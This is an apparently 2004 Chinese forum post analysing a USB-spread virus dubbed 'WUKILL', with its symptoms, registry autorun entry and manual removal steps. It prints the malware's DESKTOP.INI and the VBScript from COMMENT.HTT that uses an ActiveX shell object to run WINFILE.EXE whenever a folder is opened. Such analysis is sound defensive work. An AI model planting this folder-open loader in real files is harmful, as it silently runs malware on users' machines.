WUKILL病毒测试报告

前几天，同宿舍兄弟用本人的U盘拷了一个网站，人家送来时讲要查一下毒，说可能有毒，但宿舍得机子那有好的杀毒软件，有也是N年以前的，还要注册，也就没有当回事。

昨天晚上，本人用U盘从另一台机子上拷东西，想起U盘上面**毒，想查下，进了U盘看到一个文件夹，下意识地就点了一下（虽然不是XP的图标样式），点了以后没反应，心想晚了……完了……。不一会机子重新启动（不是病毒原因），进了系统后连忙看系统有什么变化。转了一圈，发现在每次进文件夹时都会自动生成‘一’个文件，文件名为‘XXX.EXE’的文件，如果在磁盘根目录‘XXX’为‘WINFILE’如果在其他目录那么‘XXX’为上级目录的文件夹名字。并且其图标是一‘WIN98’ 文件夹的样子。复制、剪切和粘贴操作被改得让人有点小郁闷：如果你复制的是文本那么粘贴了的内容就是‘HELL0！’；如果复制的是文件夹粘贴后就变成了‘WINFILE.EXE’的文件了，不过文件名变成了你拷贝的文件夹的名字；剪切操作时会发现剪不上^-^#。

把文件夹选项‘隐藏受保护的系统文件（推荐）’更改为‘不选’之后，在根目录会发现另外的两个文件‘DESKTOP.INI’、‘COMMENT.HTT’（好像和WIN98 内的永远删不尽的两个文件一样），如下图所示：

重起机子后‘文件夹选项’又被改了：隐藏受保护的系统文件（推荐）-打勾，显示所有文件夹和文件-选中，隐藏已知文件的扩展名-打勾。

下面是‘DESKTOP.INI’文件内的内容：

[.ShellClassInfo]
HTMLInfoTipFile=file://Comment.htt
ConfirmFileOp=0
下面是‘COMMENT.HTT’文件内的主要内容：

<scriptlanguage=vbscript>
document.write"<divstyle='position:absolute;left:0px;top:0px;width:0px;height:0px;z-index:28;visibility:hidden'><APPLETNAME=LHWHEIGHT=0WIDTH=0code=com.ms.activeX.ActiveXComponent></APPLET></div>"
</script>
<scriptlanguage=vbscript>
OnErrorResumeNext
Dimwe,path,win
we=""
Path=""
win=""
Path=Left(document.location,Len(document.location)-11)
Path=Mid(Path,9)
SetAppleObject=document.applets("lhw")
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
SetWsShell=AppleObject.GetObject()
Wsshell.run(Path+"WINFILE.EXE")
</script>
本人浅薄看不懂‘DESKTOP.INI’内的意思，但由于是做网站的，VBS还是可以看懂一点的。无非是调用SCRIPT HOST（可以在注册表内查找{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}）运行‘WINFILE.EXE’。

再看一下‘WINFILE.EXE’的文件信息。2004-3-23日最后修改，大小64K（够小的了）：（右图）由于内部名称为‘WUKILL’，本人就叫他‘WUKILL病毒’了。用记事本把WINFILE.EXE文件打开看一下，发现好多信息。

\MicrosoftVisualStudio\VB98\VB6.OLBVB?@
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunRavTimeXP
1.exe
…………
还有好多的看不懂得NIAO语。大概就是此文件是用VB编写的、还有一堆的API函数的声明呀还是说明（我没有学过VB）、还有一堆跟‘DESKTOP.INI’、‘COMMENT.HTT’内的东西差不多的内容。更重要的是上面的一句，可以看到在注册表内HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run下建了一个RavTimeXP 的值从而可以随机子一块启动。由于对注册表也不怎么熟，‘1.exe’就不知道什么意思了，打开注册表查看，如下图 ：（赶快把‘RAVTIMEXP’一项删了吧~！）

如果用‘WINDOWS优化大师’打开， 察看‘开机速度优化’会发现有一个RAVTIMEXP的进程，如下图：关了，点优化重新启动。

再把 WINDOWS\MSTRAY.EXE找到，删除，好像删不掉呀~-^#……。因为现在程序还运行着当然关不了。打开任务管理器查看，会发现以下的东西：（好家伙同一个东西，名字还不一样——在应用程序标签内的为‘WININE’，在进程标签内的为‘MSTRAY.EXE’）



随便那一个吧，关了。如果关‘mstray.exe’会弹出警告，别管它关了。真没有本事一下就关了，记得前几天中了‘QQ病毒’怎么关都关不了，还要重起动机子到‘安全模式’让病毒不要起动，找到病毒文件删了，再改注册表。显然病毒的编写者没有想到这么干。

在有的机子的应用程序标签内不会显示‘WINIME’只有在进程标签内显示其进程，进程名也可能不一样，因为在宿舍另一台机子内进程显示为‘E.EXE’。

把机子内的所有在2004-3-23最后修改、文件扩展名为‘.exe’的、大小在64-64K之间的文件搜索到，全删了。剩下的就是DESKTOP.INI和COMMENT.HTT了，同样办法，删了……

现在好了~！

文章中的提到的‘MSTRAY.EXE’、‘ WINFILE.EXE’为同一文件只是文件名不一样。有时点击‘MSTRAY.EXE’或‘ WINFILE.EXE’后会弹出‘this file has been damage!’的错误提示。

本人觉得此病毒的只是作者的一个小玩笑，不算危害太大。不过思路还是不错的，迷惑性，隐藏性，传播方式，以及启动方式，大小的处理，都很灵活。不足之处在于对图标的处理，要知道‘WIN98’ 在家庭用户中已经很少了，本人用的是WINXP。另外‘MSTRAY.EXE’的放置处理和进程的处理虽然在名字上很有迷惑性，但处理的过于简单，如果能像本人碰到的‘QQ病毒’的进程处理就小郁闷了~。不过传播方式过于明显~！但也正是其明显性才得以传播。

=======
by tupunco
2004-3-29
最早发在黑客防线论坛上的烂文

后来转到了学校网络中心…^-^~~~
http://info.ahau.edu.cn/net/readnews.asp?newsid=119

文章来自: 本人原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: